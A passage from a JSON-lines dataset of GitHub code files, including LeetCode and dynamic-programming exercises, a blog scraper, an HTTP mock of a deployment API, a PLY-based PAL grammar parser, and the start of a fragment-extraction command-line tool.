\nThe new list should be made by splicing together the nodes of the first two lists.\n\nExample:\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n'''\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\nclass Solution:\n    '''\n    I am not familiar with linked-list operations,\n    so pay attention to this!\n    '''\n    def merge(self, l1, l2):\n        '''\n        Add a third linked list to simplify.\n        Iteratively.\n        '''\n        head = cur = ListNode(0)\n        while l1 and l2:\n            if l1.val < l2.val:\n                cur.next = l1\n                l1 = l1.next\n            else:\n                cur.next = l2\n                l2 = l2.next\n            cur = cur.next\n        cur.next = l1 or l2\n        return head.next\n\n    def merge2(self, l1, l2):\n        '''\n        Recursively.\n        '''\n        if not l1 or not l2:\n            return l1 or l2\n        if l1.val < l2.val:\n            l1.next = self.merge2(l1.next, l2)\n            return l1\n        else:\n            l2.next = self.merge2(l1, l2.next)\n            return l2\n\n    \n    \n","repo_name":"Veraph/LeetCode_Practice","sub_path":"cyc/linked_list/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24303788670","text":"\"\"\"\nWrite a program that counts the number of ways to fill a 2×n rectangle with 1×2 and 2×1 tiles.\nThe figure below shows one example way of filling a 2×5 rectangle.\n\"\"\"\nn = int(input())\nary = []\nfor i in range(n+1):\n    if i == 0:\n        ary.append(1)\n    elif i == 1:\n        ary.append(1)\n    else:\n        ary.append(ary[i-2] + ary[i-1])\n\nresult = ary[n]\n\nprint(result % 10007)","repo_name":"SeungGyu-Kwak/Python_Study-with-BackJoon","sub_path":"DP(동적계획)/Q_11726.py","file_name":"Q_11726.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26719683140","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nlink = 'https://blogs.worldbank.org/search%3Ff%5B0%5D%3Dlanguage%3Aen%26f%5B1%5D%3Dtopic%3A303'\nquote_link = \"https://api.quotable.io/random\"\ndate_frmt = \"%B %d, %Y\"\noutput_frmt = \"%d %b\"\n\n\ndef get_blogs():\n    r = requests.get(link)\n    soup = BeautifulSoup(r.content, 'html.parser')\n    s = soup.find('div', class_=\"view-content\")\n    h = s.find_all('h3', class_=\"field-content\")\n    div = s.find_all('div', class_=\"field-content\")\n    span = s.find_all('span', class_=\"field-content\")\n\n    a_links = []\n    headers = []\n    descrip = []\n    dates = []\n    dt = []\n\n    for h3 in h:\n        a_tag = h3.find('a') # Find the <a> tag within each <h3>
element\n if a_tag:\n a_links.append(f\"https://blogs.worldbank.org{a_tag['href']}\")\n headers.append(a_tag.text)\n for tag in div:\n p = tag.find('p')\n if p:\n descrip.append(p.text)\n for tag in span:\n date = tag.find('time')\n if date:\n txt = date.text\n frmt_date = datetime.strptime(txt, date_frmt)\n formatted_date = frmt_date.strftime(output_frmt)\n dates.append(formatted_date)\n\n for i in range(len(a_links)):\n dt.append([headers[i], descrip[i], a_links[i], dates[i]])\n\n return dt\n\n\ndef get_quote():\n q = requests.get(quote_link).json()\n return q[\"content\"], q[\"author\"]\n","repo_name":"Mayur-Gowda/WebDev--","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"63523479","text":"\"\"\"\nSimple deploy-v2 mock\n\"\"\"\n\nimport json\nimport urllib.parse\n\nfrom httmock import urlmatch\n\nfrom .utils import handle_http_action, http_return\n\n\ndef deploy_v2(state):\n \"\"\"\n Setup mock with state\n \"\"\"\n record_all_shipments = state['deploy-v2']['record_all_shipments']\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/minions/.+')\n def get_minion(url, _):\n minion_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-minion-get-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return(body=state['deploy-v2']['minions'][minion_id])\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='put', path='/v1/minions/.+')\n def create_minion(url, request):\n minion_id = url.path.split('/')[-1]\n data = json.loads(request.body)\n ret = handle_http_action(state, f'deploy-v2-minion-create-{minion_id}')\n if ret:\n return ret\n\n data['registered'] = True\n state['deploy-v2']['minions'][minion_id] = data\n return http_return(body=data)\n\n @urlmatch(netloc='deploy-v2.test', method='post', path='/v1/minions/.+/unregister')\n def unregister_minion(url, request):\n minion_id = url.path.split('/')[-2]\n ret = handle_http_action(state, f'deploy-v2-minion-unregister-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return()\n\n return http_return(code=404, body={'message': 'minion not created'})\n\n @urlmatch(netloc='deploy-v2.test', method='delete', path='/v1/minions/.+')\n def delete_minion(url, _):\n minion_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-minion-delete-{minion_id}')\n if ret:\n return ret\n\n if minion_id in state['deploy-v2']['minions']:\n return http_return(body=state['deploy-v2']['minions'].pop(minion_id))\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/shipments/.+')\n def get_shipment(url, _):\n shipment_id = url.path.split('/')[-1]\n ret = handle_http_action(state, f'deploy-v2-shipment-get-{shipment_id}')\n if ret:\n return ret\n\n if shipment_id in state['deploy-v2']['shipments']:\n return http_return(body=state['deploy-v2']['shipments'][shipment_id])\n\n return http_return(code=404, body={'message': 'data not found'})\n\n @urlmatch(netloc='deploy-v2.test', method='post', path='/v1/shipments')\n def create_shipment(_, request):\n data = json.loads(request.body)\n commands = '-'.join(x['type'] for x in data['commands'] if x['type'] != 'saltutil.sync_all')\n shipment_id = f'{data[\"fqdns\"][0]}-{commands}'\n\n if 
record_all_shipments:\n prefix = shipment_id\n suffix_num = 2\n\n while shipment_id in state['deploy-v2']['shipments']:\n suffix_num += 1\n shipment_id = f'{prefix}-{suffix_num}'\n\n ret = handle_http_action(state, f'deploy-v2-shipment-create-{shipment_id}')\n if ret:\n return ret\n\n state['deploy-v2']['shipments'][shipment_id] = data\n state['deploy-v2']['shipments'][shipment_id]['id'] = shipment_id\n state['deploy-v2']['shipments'][shipment_id]['status'] = 'done'\n\n return http_return(body=state['deploy-v2']['shipments'][shipment_id])\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/jobs')\n def get_jobs(url, request):\n shipment_id = url.query.split('=')[1]\n\n if 'jobs' in state['deploy-v2'] and shipment_id in state['deploy-v2']['jobs']:\n return http_return(body={'jobs': state['deploy-v2']['jobs'][shipment_id]})\n\n return http_return(code=404, body={'message': 'jobs not found for shipment_id=' + shipment_id})\n\n @urlmatch(netloc='deploy-v2.test', method='get', path='/v1/jobresults')\n def get_jobresults(url, request):\n qp = urllib.parse.parse_qs(url.query)\n ext_job_id = qp['extJobId'][0]\n fqdn = qp['fqdn'][0]\n\n if 'jobresults' not in state['deploy-v2']:\n return http_return(code=404, body={'message': 'jobresults not intialized'})\n\n for jr in state['deploy-v2']['jobresults']:\n if jr['fqdn'] == fqdn and jr['extID'] == ext_job_id:\n return http_return(body={'jobResults': [jr]})\n\n return http_return(\n code=404, body={'message': 'jobresults not found for ext_job_id=' + ext_job_id + ', fqdn=' + fqdn}\n )\n\n return (\n get_minion,\n create_minion,\n delete_minion,\n get_shipment,\n create_shipment,\n unregister_minion,\n get_jobs,\n get_jobresults,\n )\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/test/mocks/deploy_v2.py","file_name":"deploy_v2.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603135398","text":"import numpy as np\n\nimport viscojapan as vj\n\ndip_patch_size = 4\nstrike_patch_size = 4\nfault_file = 'fault_bott80km.h5'\n\nslip = vj.inv.test.gen_checkerboard_slip_from_fault_file(\n fault_file,\n dip_patch_size = dip_patch_size,\n strike_patch_size = strike_patch_size)\n\nslip *= 2\n\n\nflt_reader = vj.fm.FaultFileReader(fault_file)\nlats = flt_reader.LLats_mid\nlons = flt_reader.LLons_mid\n\n \nwith open('_checkerboard_slip.txt','wt') as fid:\n for lon, lat, s in zip(np.nditer(lons),\n np.nditer(lats),\n np.nditer(slip),\n ):\n fid.write('%f %f %f\\n'%(lon,lat,s))\n\n","repo_name":"zy31415/viscojapan","sub_path":"agu-paper/checkerboard_test/gmt/gen_checkerboard_slip.py","file_name":"gen_checkerboard_slip.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"73849064553","text":"def bubble(l):\n rez = []\n r = True\n while r:\n r = False\n for i in range(len(l) - 1):\n if l[i] > l[i + 1]:\n l[i], l[i + 1] = l[i + 1], l[i]\n r = True\n return l\n\n\nprint(bubble([2,0,2,1,1,0]))\n","repo_name":"alex-radchenko-github/codewars-and-leetcode","sub_path":"codewars/7kata/Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23950823096","text":"### PAL Grammar rules Parser\n\nimport ply.yacc as yacc\n\n# Get the token map from the lexer. 
This is required.\nfrom PALLexer import tokens\nfrom random import randint\n#Global key value dictionaries\n#key = Organism ID value = max value of organisms in the model\norgmax = {}\n#key = Organism ID value = initial value of organisms in the model\norginitial = {}\n\n#key = Organism ID value = list of dictionaries key = action name and value = population operator\norgpopactions = {}\n#key = Organism ID value = list of dictionaries key = action name and value = list [action type,operator,different operator,otherorgid]\norgpopactionnames = {}\n\n#key = Organism ID value = list of internal species of that organism\norgspecies = {}\n\n#key = internal species ID value = list of actions of that species\nspeciesactions = {}\n#key = Organism ID value = list of species actions of that organism\norgactions = {}\n\n#key = internal species ID value = list of parameters of that species\norgparameters = {}\n\n#key = Organism ID value value key species id value parameter expression\norginitialresets = {}\n\n\n###Starting rule which specifies the parts of a PAL model\n##def p_palmodel_1(p):\n## 'palmodel : maxpoplist modelcomponent biospeciesbehaviours parameters actionrates organisms populations'\n## p[0] = p[4] + '\\n' + p[5] + '\\n' + p[3] + '\\n' + addonandoffspecies() + '\\n' + p[6]\n\ndef p_palmodel_1(p):\n 'palmodel : maxpoplist modelcomponent populations organisms initialresets biospeciesbehaviours parameters actionrates'\n p[0] = p[7] + '\\n'+ addintialresetparasandactionrates() + '\\n' + p[8] + '\\n' + p[6] + '\\n' + p[3] + '\\n' + p[4]\n\n#initial reset rules\ndef p_intialresets_1(p):\n 'initialresets : initialresets initialreset'\n p[0] = p[1] + p[2]\n\ndef p_intialresets_2(p):\n 'initialresets : initialreset'\n p[0] = p[1]\n\ndef p_initialreset(p):\n 'initialreset : IDENTIFIER IDENTIFIER EQUALS expression SEMICOLON'\n createorginitialresetdictionary(p)\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + ' ; ' + '\\n'\n\n#parameter rules\ndef p_parameters_1(p):\n 'parameters : parameters parameter'\n p[0] = p[1] + p[2]\n\ndef p_parameters_2(p):\n 'parameters : parameter'\n p[0] = p[1]\n\ndef p_parameter(p):\n 'parameter : IDENTIFIER EQUALS expression SEMICOLON'\n p[0] = addorganismidtoparameters(p)\n\n#action rate rules\ndef p_actionrates_1(p):\n 'actionrates : actionrates actionrate'\n p[0] = p[1] + p[2]\n\ndef p_actionrates_2(p):\n 'actionrates : actionrate'\n p[0] = p[1]\n\ndef p_actionrate(p):\n 'actionrate : IDENTIFIER COLON expression SEMICOLON'\n p[0] = addorganismidtoactions(p)\n\n#same expression rule used in parameters and actionrates\ndef p_expression_power(p):\n 'expression : expression POWER term'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_expression(p):\n '''expression : expression PLUS term\n | expression MINUS term '''\n if p[2] == '+':\n p[0] = p[1] + ' + ' + p[3]\n elif p[2] == '-':\n p[0] = p[1] + ' - ' + p[3]\n\ndef p_expression_term(p):\n 'expression : term'\n p[0] = p[1]\n\ndef p_term_times(p):\n 'term : term TIMES factor'\n p[0] = p[1] + ' * ' + p[3]\n\ndef p_term_divides(p):\n 'term : term DIVIDE factor'\n p[0] = p[1] + ' / ' + p[3]\n\ndef p_term_factor(p):\n 'term : factor'\n p[0] = p[1]\n \ndef p_factor(p):\n '''factor : NUMBER\n | IDENTIFIER'''\n p[0] = ' ' + p[1] + ' '\n\ndef p_factor2(p):\n 'factor : MINUS NUMBER'\n p[0] = ' ' + p[1] + p[2] + ' '\n \n\ndef p_factor_expr(p):\n 'factor : LEFTBRACKET expression RIGHTBRACKET'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n\n#For Heaviside step function,fMA and exp\ndef p_factor_h(p):\n 'factor : IDENTIFIER LEFTBRACKET 
expression RIGHTBRACKET'\n p[0] = p[1] + p[2] + p[3] + p[4]\n\n##def p_expression_power1(p):\n## 'expression : expression POWER term'\n## p[0] = p[1] + p[2] + p[3]\n\n#biospecies behaviour rules\ndef p_biospeciesbehaviours_1(p):\n 'biospeciesbehaviours : biospeciesbehaviours biospeciesbehaviour'\n p[0] = p[1] + p[2]\n\ndef p_biospeciesbehaviours_2(p):\n 'biospeciesbehaviours : biospeciesbehaviour'\n p[0] = p[1]\n\ndef p_biospeciesbehaviour(p):\n 'biospeciesbehaviour : IDENTIFIER EQUALS bioactions SEMICOLON'\n addtoactiondictionararies(p)\n p[0] = addorganismidtospecies(p)\n\ndef p_bioactions_1(p):\n 'bioactions : bioactions PLUS bioaction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n\ndef p_bioactions_2(p):\n 'bioactions : bioaction'\n p[0] = p[1]\n\ndef p_bioaction_1(p):\n 'bioaction : IDENTIFIER baction'\n p[0] = p[1] + ' ' + p[2]\n\ndef p_bioaction_2(p):\n 'bioaction : LEFTBRACKET IDENTIFIER COMMA NUMBER RIGHTBRACKET baction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + p[5]+ ' ' + p[6]\n\ndef p_baction(p):\n '''baction : BIOPRODUCT\n | BIOREACTANT\n | BIOMODIFIER\n | BIOACTIVATOR\n | BIOINHIBITOR '''\n p[0] = p[1]\n\n#organism\ndef p_organisms_1(p):\n 'organisms : organisms organism'\n #Add sync between different species organisms\n p[0] = p[1] + '<*> ' + p[2]\n \n \ndef p_organisms_2(p):\n 'organisms : organism'\n p[0] = p[1]\n\ndef p_organism(p):\n 'organism : IDENTIFIER EQUALS biospeciesmodelcomponent'\n addtoorgspeciesdictionary(p)\n p[0] = makemodelcomponent(p)\n\ndef p_biospeciesmodelcomponent_1(p):\n 'biospeciesmodelcomponent : biospeciesmodelcomponent biosync bioinitial'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] \ndef p_biospeciesmodelcomponent_2(p):\n 'biospeciesmodelcomponent : bioinitial'\n p[0] = ' ' + p[1] + ' '\n\ndef p_bioinitial(p):\n 'bioinitial : IDENTIFIER LEFTSQUAREBRACKET NUMBER RIGHTSQUAREBRACKET'\n p[0] = p[1] + ' ' + p[2] + p[3] + p[4] \n\ndef p_biosync(p):\n '''biosync : LEFTANGLEBRACKET TIMES RIGHTANGLEBRACKET\n | LEFTANGLEBRACKET listofids RIGHTANGLEBRACKET '''\n p[0] = p[1] + p[2] + p[3]\n\n#population\ndef p_populations_1(p):\n 'populations : populations population'\n# p[0] = p[1] + p[2]\n createpopactionnamesdictionary()\n p[0] = addonandoffspecies()\n \ndef p_populations_2(p):\n 'populations : population'\n p[0] = p[1]\n \ndef p_population(p):\n 'population : populationid EQUALS popactions SEMICOLON'\n addtopopactiondictionary(p)\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + ' ' + p[4] + '\\n'\n\n \n#Also used in modelcomponent rules\ndef p_populationid(p):\n 'populationid : IDENTIFIER LEFTDOUBLECURLYBRACKET IDENTIFIER RIGHTDOUBLECURLYBRACKET'\n p[0] = p[1] + ' ' + p[2] + ' '+ p[3] + ' ' + p[4]\n\ndef p_popactions_1(p):\n 'popactions : popactions PLUS popaction'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3]\n \ndef p_popactions_2(p):\n 'popactions : popaction'\n p[0] = p[1] \n\ndef p_popaction(p):\n 'popaction : IDENTIFIER paction'\n p[0] = p[1] + ' ' + p[2]\n \ndef p_paction(p):\n ''' paction : PALADDITION\n | PALDELETION\n | PALACTIVATOR '''\n p[0] = p[1]\n\n\n#population modelcomponent\ndef p_modelcomponent_1(p):\n ' modelcomponent : modelcomponent palsync popinitial'\n p[0] = p[1] + ' ' + p[2] + ' ' + p[3] + '\\n'\n\ndef p_modelcomponent_2(p):\n ' modelcomponent : popinitial'\n p[0] = p[1]\n\ndef p_popinitial_1(p):\n 'popinitial : populationid LEFTDOUBLESQUAREBRACKET NUMBER RIGHTDOUBLESQUAREBRACKET'\n p[0] = p[1] + p[2] + p[3] + p[4]\n global orginitial\n #get popid and split up string\n popid = p[1].split()\n i=1\n #Get the organism name\n for word in 
popid:\n if i==3 :\n #Add organism name key and initial value\n orginitial[word] = p[3]\n i = i +1\n \ndef p_palsync(p):\n 'palsync : LEFTCURLYBRACKET listofids RIGHTCURLYBRACKET'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofids_1(p):\n 'listofids : listofids COMMA IDENTIFIER'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofids_2(p):\n 'listofids : IDENTIFIER'\n p[0] = p[1]\n\n#Max population\ndef p_maxpoplist(p):\n 'maxpoplist : IDENTIFIER COLON listofmaxpops SEMICOLON'\n p[0] = p[1] + p[2] + p[3] + p[4] + '\\n'\n\ndef p_listofmaxpops_1(p):\n 'listofmaxpops : listofmaxpops COMMA popmax'\n p[0] = p[1] + p[2] + p[3]\n\ndef p_listofmaxpops_2(p):\n 'listofmaxpops : popmax'\n p[0] = p[1]\n\ndef p_popmax(p):\n 'popmax : IDENTIFIER LEFTDOUBLECURLYBRACKET IDENTIFIER RIGHTDOUBLECURLYBRACKET NUMBER'\n p[0] = p[1] + p[2] + p[3] + p[4] + ' ' + p[5]\n global orgmax\n orgmax[p[3]] = p[5]\n \n# Error rule for syntax errors\ndef p_error(p):\n if p:\n print(\"Syntax ERROR at token: \",\"Type: \", p.type,\"Value:\" , p.value ,\"LineNo: \", p.lineno)\n else:\n print(\"Syntax error at End Of File\")\n\n#Functions used in parser rules\n\n#Create initialresetdicitionary\ndef createorginitialresetdictionary(p):\n global orgspecies\n global orginitialresets\n\n internalspeciesname = p[2]\n species = []\n speciesreset = {}\n\n for orgid in orgspecies:\n species = orgspecies[orgid]\n if internalspeciesname in species:\n speciesreset[internalspeciesname] = p[4]\n if orgid in orginitialresets:\n orginitialresets[orgid].update(speciesreset)\n else:\n orginitialresets[orgid] = speciesreset\n \n\n#Add on and off species\ndef addonandoffspecies():\n global orgpopactionnames\n global orgmax\n\n noworgid = ''\n popactions = {}\n result = ''\n actionbefore = False\n \n\n for nowid in orgmax:\n \n popactions = orgpopactionnames[nowid]\n\n i=1\n while i < int(orgmax[nowid]) +1:\n onactions,offactions = '',''\n actionbefore=False\n \n for action in popactions:\n infolist=popactions[action]\n if 'async' in infolist:\n if infolist[1] == '<<<':\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createdeleteactions(i,nowid,action,actionbefore)\n else :\n on,off = createdeleteactions(i,nowid,action,actionbefore)\n onactions += on\n offactions += off\n if infolist[1] == '>>>':\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createaddactions(i,nowid,action,actionbefore)\n else :\n on,off = createaddactions(i,nowid,action,actionbefore)\n onactions += on\n offactions += off\n actionbefore=True\n if 'switch1' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncdeleteactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = createsyncdeleteactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'switch2' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'repro1' in infolist:\n #Check if an action of this type has been parsed already\n if onactions == '':\n onactions,offactions = createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n else :\n on,off = 
createsyncaddactions(i,nowid,action,infolist[3],actionbefore)\n onactions += on\n offactions += off\n actionbefore= True\n if 'repro2' in infolist:\n #Deal with this type of popaction in internal species actions\n pass\n \n result += 'On_' + nowid + str(i) + ' = ' + onactions+';' + '\\n'\n result += 'Off_' + nowid + str(i) + ' = ' + offactions +';' + '\\n'\n i = i+1\n\n result += '\\n'\n \n return result\n\n#Create delete actions for organism that has a popaction which deletes it\ndef createdeleteactions(number,organismid,action,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n \n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + ' <<'\n result2 = action + '_' + organismid + str(number) + ' >>'\n else:\n result1 = ' + ' + action + '_' + organismid + str(number) + ' <<'\n result2 = ' + ' + action + '_' + organismid + str(number) + ' >>'\n \n return result1,result2\n\n#Create add actions for organism that has a popaction which adds it\ndef createaddactions(number,organismid,action,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n \n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + ' >>'\n result2 = action + '_' + organismid + str(number) + ' <<'\n else:\n result1 = ' + ' + action + '_' + organismid + str(number) + ' >>'\n result2 = ' + ' + action + '_' + organismid + str(number) + ' <<'\n \n return result1,result2 \n\n#Create sync delete actions for organism that has a popaction which deletes it\ndef createsyncdeleteactions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n result2 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n result2 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n i = i + 1\n \n return result1,result2\n\n#Create sync add actions for organism that has a popaction which adds a new organism\ndef createsyncaddactions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' >>'\n result2 = action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' <<'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' >>'\n result2 += ' + ' + action + '_' + otherorgid + str(i) + '_' + organismid + str(number) + ' <<'\n i = i + 1\n \n return result1,result2\n\n#For internal species pop actions\n#Create sync add actions for organism that has a popaction which adds a new organism\ndef createsyncadd2actions(number,organismid,action,otherorgid,actionbefore):\n global orgmax\n \n result1 = ''\n result2 = ''\n\n #Find max value for other organism\n otherorgmax = orgmax[otherorgid]\n i = 1\n while i < int(otherorgmax) + 1:\n if actionbefore == False:\n result1 = action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n result2 = action + '_' + organismid + 
str(number) + '_' + otherorgid + str(i) + ' <<'\n actionbefore = True\n else :\n result1 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' >>'\n result2 += ' + ' + action + '_' + organismid + str(number) + '_' + otherorgid + str(i) + ' <<'\n i = i + 1\n \n return result1,result2\n\n#Add entry to popactionsdictionary\ndef addtopopactiondictionary(p):\n #Variables\n global orgpopactions\n \n #Split Popid\n popid = p[1].split()\n #Get organism id from popid\n orgid = popid[2]\n\n #split the popactions into separate words\n popacts = p[3].split()\n\n #Add orgid and popactions to dictionary\n orgpopactions[orgid] = makeactionoperatordictionary(popacts)\n\n#Create dictionary of actions and their associated operator\ndef makeactionoperatordictionary(popacts):\n popactions = {}\n actionname=''\n\n for word in popacts:\n if '+' == word:\n pass\n if '(' in word or ')' in word or '>' in word or '<' in word:\n popactions[actionname] = word\n else :\n actionname = word\n \n return popactions\n\n#Create popactionnames dictionary\ndef createpopactionnamesdictionary():\n global orgpopactions\n global orgpopactionnames\n\n \n for nowid in orgmax:\n #Get organism id from popid\n noworgid = nowid\n popactions = orgpopactions[noworgid]\n \n #Make a dictionary of key actionid and values operators for now organism id\n #All the actions that are associated with the now organism population and all the operators associated with that action\n orgsameactions = {}\n for orgid in orgpopactions:\n acts = orgpopactions[orgid]\n for action in acts:\n if action in orgsameactions:\n orgsameactions[action].append(acts[action])\n else:\n orgsameactions[action] = [acts[action]]\n\n for act in popactions:\n if act in orgsameactions:\n #Find if the action is shared with other population\n if len(orgsameactions[act]) < 2:\n #This is pop action that is not synchronised with other population\n makeandaddactiontypedictionary(noworgid,act,'async',orgsameactions[act][0],'none')\n else :\n i = 0\n while i < len(orgsameactions[act]):\n #Find the action and operator associated with now organism population\n if orgsameactions[act][i] == popactions[act]:\n sameaction = act\n sameoperator = orgsameactions[act][i]\n else:#Find the operator associated with other organism population\n differentoperator = orgsameactions[act][i]\n i = i+1\n #Find out what kind of action is synchronised by what type of operators\n #Switch action now organism population decrease other organism population increase\n if sameoperator == '<<<' and differentoperator == '>>>':\n makeandaddactiontypedictionary(noworgid,act,'switch1',sameoperator,differentoperator)\n #Switch action now organism population increase other population decrease\n if sameoperator == '>>>' and differentoperator == '<<<':\n makeandaddactiontypedictionary(noworgid,act,'switch2',sameoperator,differentoperator)\n #Reproduction action now organism population increase other population stays the same\n if sameoperator == '>>>' and differentoperator == '((+))':\n makeandaddactiontypedictionary(noworgid,act,'repro1',sameoperator,differentoperator)\n #Reproduction action now organism population stays the same other population increases\n if sameoperator == '((+))' and differentoperator == '>>>':\n makeandaddactiontypedictionary(noworgid,act,'repro2',sameoperator,differentoperator)\n\n\n#Create dictionary of action and their associated type and add to orgpopactionnames dictionary\ndef 
makeandaddactiontypedictionary(orgid,actionname,actiontype,sameoperator,differentoperator):\n global orgpopactionnames\n otherorgid=''\n\n #Find other organisms id\n for key in orgpopactions:\n if actionname in orgpopactions[key]:\n if key == orgid:\n pass\n else:\n otherorgid = key\n \n #If action is type async it will not have a different operator or another organism associated with it\n if actiontype == 'async':\n actioninfolist=[actiontype,sameoperator]\n else:\n actioninfolist=[actiontype,sameoperator,differentoperator,otherorgid]\n \n actiontype = {actionname:actioninfolist}\n if orgid in orgpopactionnames:\n orgpopactionnames[orgid].update(actiontype)\n else:\n orgpopactionnames[orgid] = actiontype\n\n\n \n#Add and sometimes multiply parameters based on max value for organism.\n#Add parameter to orgparameter dictionary only if they are associated to an organism.\n#Multiply parameters based on if there are species ids in their expression. \ndef addorganismidtoparameters(p):\n #Variables\n addorgid, orgid = isspeciesinparameter(p)\n global orgmax\n global orgparameters\n right = ''\n\n if addorgid == False:\n right = p[1] + ' ' + p[2] + p[3] + p[4] + '\\n' + '\\n'\n\n if addorgid == True:\n #Add parameter to more than one orgid if needed\n ids = orgid.split()\n\n a = 0\n while a ... [options]'''\nFLAGS = ('approx', 'indices', 'nofreq', 'complete', 'alt',\n\t\t'relfreq', 'adjacent', 'debin', 'debug', 'quiet', 'help')\nOPTIONS = ('fmt=', 'numproc=', 'numtrees=', 'encoding=', 'batch=', 'cover=',\n\t\t'twoterms=')\nPARAMS = {}\nFRONTIERRE = re.compile(r'\\(([^ ()]+) \\)') # for altrepr()\nTERMRE = re.compile(r'\\(([^ ()]+) ([^ ()]+)\\)') # for altrepr()\n\n\ndef main(argv=None):\n\t\"\"\"Command line interface to fragment extraction.\"\"\"\n\tif argv is None:\n\t\targv = sys.argv[2:]\n\ttry:\n\t\topts, args = gnu_getopt(argv, 'ho:', FLAGS + OPTIONS)\n\texcept GetoptError as err:\n\t\tprint('error:', err, file=sys.stderr)\n\t\tprint(SHORTUSAGE)\n\t\tsys.exit(2)\n\topts = dict(opts)\n\n\tfor flag in FLAGS:\n\t\tPARAMS[flag] = '--' + flag in opts\n\tPARAMS['disc'] = opts.get('--fmt', 'bracket') != 'bracket'\n\tPARAMS['fmt'] = opts.get('--fmt', 'bracket')\n\tnumproc = int(opts.get('--numproc', 1))\n\tif numproc == 0:\n\t\tnumproc = cpu_count()\n\tif not numproc:\n\t\traise ValueError('numproc should be an integer > 0. got: %r' % numproc)\n\tlimit = int(opts.get('--numtrees', 0)) or None\n\tPARAMS['cover'] = None\n\tif '--cover' in opts and ',' in opts['--cover']:\n\t\ta, b = opts['--cover'].split(',')\n\t\tPARAMS['cover'] = int(a), int(b)\n\telif '--cover' in opts:\n\t\tPARAMS['cover'] = int(opts.get('--cover', 0)), 999\n\tPARAMS['twoterms'] = opts.get('--twoterms')\n\tencoding = opts.get('--encoding', 'utf8')\n\tbatchdir = opts.get('--batch')\n\n\tif len(args) < 1:\n\t\tprint('missing treebank argument')\n\tif batchdir is None and len(args) not in (1, 2):\n\t\tprint('incorrect number of arguments:', args, file=sys.stderr)\n\t\tprint(SHORTUSAGE)\n\t\tsys.exit(2)\n\tif batchdir:\n\t\tif numproc != 1:\n\t\t\traise ValueError('Batch mode only supported in 